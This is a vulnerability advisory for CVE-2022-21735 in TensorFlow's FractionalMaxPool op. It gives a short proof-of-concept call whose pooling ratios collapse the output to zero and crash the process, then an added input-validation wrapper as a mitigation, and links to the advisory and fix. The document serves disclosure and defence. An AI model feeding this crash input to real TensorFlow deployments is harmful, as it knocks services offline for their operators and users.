CVE-2022-21735: Division by zero in Tensorflow
The implementation of FractionalMaxPool can be made to crash a TensorFlow process via a division by 0:
```python
import tensorflow as tf
import numpy as np

# Proof of concept from the advisory: the input has spatial dimensions of size 1,
# and the pooling ratios of 1.44 and 1.73 shrink them to an output size of 0,
# which the kernel then divides by.
tf.raw_ops.FractionalMaxPool(
    value=tf.constant(value=[[[[1, 4, 2, 3]]]], dtype=tf.int64),
    pooling_ratio=[1.0, 1.44, 1.73, 1.0],
    pseudo_random=False,
    overlapping=False,
    deterministic=False,
    seed=0,
    seed2=0,
    name=None)
```
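As an added example (not part of the advisory and not TensorFlow's own fix), a pre-flight check an application can run on unpatched builds before calling the op: it rejects pooling ratios that would collapse an input dimension to an output size of zero, the condition the proof of concept above triggers. It assumes the kernel derives each output size as floor(input_dim / pooling_ratio), and mirrors the documented constraints that the batch and channel ratios are 1.0 and all ratios are at least 1.0; `safe_fractional_max_pool` is a hypothetical wrapper name.

```python
import math


def fractional_pool_output_shape(input_shape, pooling_ratio):
    """Per-dimension output size, floor(input / ratio) (assumed to match the kernel)."""
    if len(input_shape) != 4 or len(pooling_ratio) != 4:
        raise ValueError("FractionalMaxPool expects a 4-D input and a 4-element pooling_ratio")
    return [int(math.floor(dim / ratio)) for dim, ratio in zip(input_shape, pooling_ratio)]


def validate_fractional_pool_args(input_shape, pooling_ratio):
    """Raise ValueError before the op runs if the arguments would produce a zero divisor.

    Returns the computed output shape when the arguments are acceptable.
    """
    # Documented constraints: batch and channel ratios are 1.0, no ratio below 1.0.
    if pooling_ratio[0] != 1.0 or pooling_ratio[3] != 1.0:
        raise ValueError("pooling_ratio for the batch and channel dimensions must be 1.0")
    if any(r < 1.0 for r in pooling_ratio):
        raise ValueError("every pooling_ratio entry must be >= 1.0")
    out = fractional_pool_output_shape(input_shape, pooling_ratio)
    collapsed = [i for i, n in enumerate(out) if n <= 0]
    if collapsed:
        raise ValueError(
            f"pooling_ratio {pooling_ratio} collapses dimension(s) {collapsed} of input "
            f"shape {list(input_shape)} to size 0; FractionalMaxPool divides by that size"
        )
    return out


def safe_fractional_max_pool(value, pooling_ratio, **kwargs):
    """Hypothetical guarded wrapper: validate first, then call the raw op."""
    validate_fractional_pool_args(list(value.shape), pooling_ratio)
    import tensorflow as tf  # imported lazily so the checks above run without TensorFlow installed
    return tf.raw_ops.FractionalMaxPool(value=value, pooling_ratio=pooling_ratio, **kwargs)
```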
References
- github.com/advisories/GHSA-87v6-crgm-2gfj
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-59.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-114.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/fractional_max_pool_op.cc
- github.com/tensorflow/tensorflow/commit/ba4e8ac4dc2991e350d5cc407f8598c8d4ee70fb
- github.com/tensorflow/tensorflow/security/advisories/GHSA-87v6-crgm-2gfj
- nvd.nist.gov/vuln/detail/CVE-2022-21735